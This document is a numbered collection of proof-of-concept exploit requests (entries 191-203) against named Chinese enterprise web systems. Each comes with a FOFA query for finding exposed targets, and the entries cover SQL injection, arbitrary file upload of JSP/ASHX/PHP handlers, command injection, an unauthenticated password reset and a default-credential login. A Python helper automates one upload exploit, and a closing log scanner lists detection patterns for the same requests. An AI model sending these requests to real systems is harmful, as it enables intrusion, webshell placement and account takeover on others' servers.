191. 亿赛通电子文档安全管理系统 (CDGServer3) NavigationAjax SQL injection
FOFA: body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

SQL Server time-based injection through id. Send the /js/../ path segment literally; a client that normalizes the URL before sending changes the request.

192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA: title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<%@ WebHandler Language="C#" Class="AverageHandler" %>
using System;
using System.Web;

public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    {
        get { return true; }
    }

    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

The raw request body is stored as the uploaded file and the name parameter supplies its .ashx extension, so the body is a minimal ASP.NET handler that answers "test".

193. 山石网科 (Hillstone) 云鉴 security management system setSystemTimeAction command execution
FOFA: body="山石云鉴主机安全管理系统"
Three requests: fetch a CSRF token, inject through setSystemTimeAction.php, then read the marker file back.

1. Get the token and substitute it for {{token}} below:
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

2. The param value is evaluated server-side, so os.system writes a marker under the web root (Content-Length matches the 97-byte body):
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

3. Read the marker back; the response body 23333333333456 confirms execution:
GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA: app="FE-协作平台"
If /servlet/uploadAttachmentServlet returns a response, the vulnerability exists.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

The filename is not sanitized: the ../ sequence walks out of the attachment directory and drops hello.jsp inside the deployed fe.war.

195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA: title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

The name field is concatenated into a shell command line: the leading ; ends the intended command, uname -a runs, and the trailing echo turns whatever the CGI appends into harmless arguments.

196. 河南省风速科技统一认证平台 password reset
FOFA: body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

No session or token is sent: xgh is the target account (staff/student number) and newPass the password it is reset to.

197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA: app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

UNION-based: 12321 (111*111) appearing in the response shows the injected SELECT was evaluated. The ;.js suffix on the path is part of the published request; send it unchanged.

198. 阿里云盘 WebDAV (aliyundrive-webdav LuCI app) command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

Needs a valid LuCI sysauth cookie. The sid value decodes to `ls />/www/aaa.txt` (backtick command substitution), which writes the root directory listing to /www/aaa.txt.

199. Cockpit CMS assetsmanager/upload file upload
FOFA: title="Authenticate Please!"

1. Fetch the login page; the response carries the csfr token:
GET /auth/login?to=/ HTTP/1.1

Response: 200, containing csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Log in with that token (the POC relies on the default admin/admin credentials) to obtain a session cookie:
POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload a PHP file with that session:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

The file is then served at /storage/uploads/tttt.php; the payload deletes itself after the first request.

200. SeaCMS 海洋影视管理系统 dmku SQL injection
FOFA: app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

Time-based (MySQL sleep(5)) through the id parameter of the ac=del action; a 5-second delay confirms it.

201. 方正全媒体新闻采编系统 (Founder) binary SQL injection
FOFA: body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

TableName is spliced straight into the query; decoded it reads: DOM_IMAGE where REFID=-1 union select '1'; WAITFOR DELAY '0:0:5';select DOM_IMAGE from IMG_LARGE_PATH. A 5-second delay (SQL Server) confirms it.

202. 微擎系统 AccountEdit arbitrary file upload
FOFA: body="/Widgets/WidgetCollection/"
First fetch the page to obtain the current __VIEWSTATE and __EVENTVALIDATION values (the Host value below is a placeholder from the original post; use the target host):
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Then substitute those two values into the upload request:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

The uploaded file is then reachable at /_data/Uploads/1123.txt: the original filename is kept, so the extension is not restricted to images. The bttnUpload value 上传图片 ("Upload image") is the button's literal caption and must be sent unchanged.
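Added example (not from the original post) for the fetch-then-replace step above: it pulls __VIEWSTATE and __EVENTVALIDATION out of the GET response with the standard-library HTML parser and serializes the multipart body in the same part order as the request. SAMPLE_HTML is constructed for the offline check; the control names, boundary and button caption are the ones on the page.

```python
"""Fetch-then-replace for the ASP.NET AccountEdit.aspx upload.

Added example, not code from the original post. SAMPLE_HTML is a constructed
stand-in for the GET /User/AccountEdit.aspx response; the field and control
names, the boundary and the button caption come from the request above.
"""
from html.parser import HTMLParser
from typing import Dict, List, Optional, Tuple, Union

BOUNDARY = "---------------------------786435874t38587593865736587346567358735687"
UPLOAD = "ctl00$MyContentPlaceHolder$ctl00$upload"
BUTTON = "ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

# Constructed sample; real pages carry much longer base64 state values.
SAMPLE_HTML = """<form method="post" action="./AccountEdit.aspx" id="form1">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTIzNDU2Nzg5MGRk" />
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEdAAJhYmNk" />
<input type="file" name="ctl00$MyContentPlaceHolder$ctl00$upload" />
</form>"""


class HiddenFieldParser(HTMLParser):
    """Collect every <input type="hidden"> as name -> value."""

    def __init__(self) -> None:
        super().__init__()
        self.fields: Dict[str, str] = {}

    def handle_starttag(self, tag: str, attrs: List[Tuple[str, Optional[str]]]) -> None:
        if tag.lower() != "input":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("type", "").lower() == "hidden" and a.get("name"):
            self.fields[a["name"]] = a.get("value", "")


def extract_state(html: str) -> Dict[str, str]:
    """Return the two ASP.NET state fields; raise if the page lacks either."""
    p = HiddenFieldParser()
    p.feed(html)
    wanted = ("__VIEWSTATE", "__EVENTVALIDATION")
    missing = [k for k in wanted if k not in p.fields]
    if missing:
        raise ValueError(f"state fields not found: {missing}")
    return {k: p.fields[k] for k in wanted}


# A part is either a text value or (filename, content, mime type).
Part = Union[str, Tuple[str, bytes, str]]


def build_multipart(parts: List[Tuple[str, Part]], boundary: str = BOUNDARY) -> bytes:
    """Serialize the parts in the given order with CRLF framing (RFC 7578)."""
    out = bytearray()
    for name, value in parts:
        out += f"--{boundary}\r\n".encode()
        if isinstance(value, tuple):
            filename, content, mime = value
            out += (f'Content-Disposition: form-data; name="{name}"; '
                    f'filename="{filename}"\r\nContent-Type: {mime}\r\n\r\n').encode()
            out += content + b"\r\n"
        else:
            out += f'Content-Disposition: form-data; name="{name}"\r\n\r\n'.encode()
            out += value.encode("utf-8") + b"\r\n"
    out += f"--{boundary}--\r\n".encode()
    return bytes(out)


def prepare_upload(html: str, filename: str, content: bytes) -> Tuple[Dict[str, str], bytes]:
    """Headers and body for the POST, in the field order the page uses."""
    state = extract_state(html)
    body = build_multipart([
        ("__VIEWSTATE", state["__VIEWSTATE"]),
        ("__EVENTVALIDATION", state["__EVENTVALIDATION"]),
        (UPLOAD, (filename, content, "text/plain")),
        (BUTTON, "上传图片"),
        ("ctl00$MyContentPlaceHolder$ctl00$txtLastName", ""),
        ("ctl00$MyContentPlaceHolder$ctl00$txtEmail", ""),
    ])
    headers = {
        "Content-Type": f"multipart/form-data;boundary={BOUNDARY}",
        "Content-Length": str(len(body)),
    }
    return headers, body


if __name__ == "__main__":
    hdrs, body = prepare_upload(SAMPLE_HTML, "1123.txt", b"Hello World!")
    print(hdrs)
    print(body.decode("utf-8"))
```

Feed the real GET response into prepare_upload instead of SAMPLE_HTML; ASP.NET rejects the POST if either state value is stale, which is why the two requests must be made against the same host in sequence.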

203. 红海云EHR PtFjk file upload
FOFA: body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

Only the part's Content-Type claims image/jpeg; the stored name keeps the .jsp extension.
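Added example for defenders (not code from the original post): a scanner that runs the request signatures of entries 187 to 203 over web-server access logs, which is the risk screening this post is meant for. The log lines are constructed; the indicators are the paths and payload fragments quoted above. Access logs carry only the request line, so POST endpoints are matched on method and path, and the POST bodies (the NavigationAjax, binary.do and send_order.cgi payloads) need a proxy or WAF log to be seen.

```python
"""Flag access-log requests that match the signatures in entries 187-203.

Added example; not code from the original post. SAMPLE_LOG is constructed
(Apache combined format, documentation IP ranges). INDICATORS holds the paths
and payload fragments taken from the requests above; tune them before running
over real logs.
"""
import re
from typing import List, Tuple
from urllib.parse import unquote_plus

# label -> pattern applied to "<METHOD> <decoded request target>"
INDICATORS = [(label, re.compile(rx, re.I)) for label, rx in [
    ("mura_processAsyncObject", r"^POST /index\.cfm/_api/json/v1/default/\?method=processAsyncObject"),
    ("attachment_file_read", r"^GET /attachment\?file=.*(?:/etc/passwd|\.\./)"),
    ("lanwon_deleteStudy_sqli", r"^GET /xds/deleteStudy\.php\?.*waitfor\s+delay"),
    ("poihuoqu_file_read", r"^POST /index\.php/admin/Userinfo/poihuoqu"),
    ("cdg_NavigationAjax", r"^POST /CDGServer3/.*NavigationAjax"),
    ("joinf_UploadEmailAttr", r"^POST /JoinfApp/EMail/UploadEmailAttr\?name=\.ashx"),
    ("hillstone_setSystemTime", r"^POST /master/ajaxActions/setSystemTimeAction\.php"),
    ("fe_uploadAttachmentServlet", r"^POST /servlet/uploadAttachmentServlet"),
    ("feiyuxing_send_order", r"^POST /send_order\.cgi\?parameter=operation"),
    ("cas_resetPasswordBySuper", r"^POST /cas/userCtl/resetPasswordBySuper"),
    ("entsoft_Quotegask_sqli", r"^GET /entsoft/Quotegask_editAction\.entweb.*union\s+all\s+select"),
    ("aliyundrive_webdav_cmdi", r"^GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query\?sid=.*[`$]"),
    ("cockpit_assetsmanager_upload", r"^POST /assetsmanager/upload"),
    ("seacms_dmku_sqli", r"^GET /js/player/dmplayer/dmku/\?.*sleep\("),
    ("founder_binary_do", r"^POST /newsedit/newsplan/task/binary\.do"),
    ("weiqing_AccountEdit_post", r"^POST /User/AccountEdit\.aspx"),
    ("redsea_PtFjk_upload", r"^POST /RedseaPlatform/PtFjk\.mob\?method=upload"),
]]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def scan_line(line: str) -> List[str]:
    """Return the indicator labels matched by one log line ([] if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    # Decode twice: the published payloads are URL-encoded, and scanners
    # sometimes double-encode them to slip past naive filters.
    target = unquote_plus(unquote_plus(m.group("target")))
    request = f"{m.group('method')} {target}"
    return [label for label, rx in INDICATORS if rx.search(request)]


def scan(lines) -> List[Tuple[str, str, List[str]]]:
    """(source ip, raw target, labels) for every line that matched something."""
    hits = []
    for line in lines:
        labels = scan_line(line)
        if labels:
            m = LOG_RE.match(line)
            hits.append((m.group("ip"), m.group("target"), labels))
    return hits


# Constructed sample: three probes from one source, one normal hit, one router probe.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Jun/2024:07:41:02 +0800] "GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [05/Jun/2024:07:41:05 +0800] "GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1" 200 17 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [05/Jun/2024:07:42:10 +0800] "POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1" 200 89 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [05/Jun/2024:07:43:00 +0800] "GET /index.php?m=home HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [05/Jun/2024:07:44:31 +0800] "GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60id%60 HTTP/1.1" 200 40 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for ip, target, labels in scan(SAMPLE_LOG):
        print(ip, ",".join(labels), target)
```

Pipe a real log in with `scan(open("access.log"))`; a 200 on an upload or command-execution endpoint is worth more attention than a 404, so carry the status group through if you extend the output.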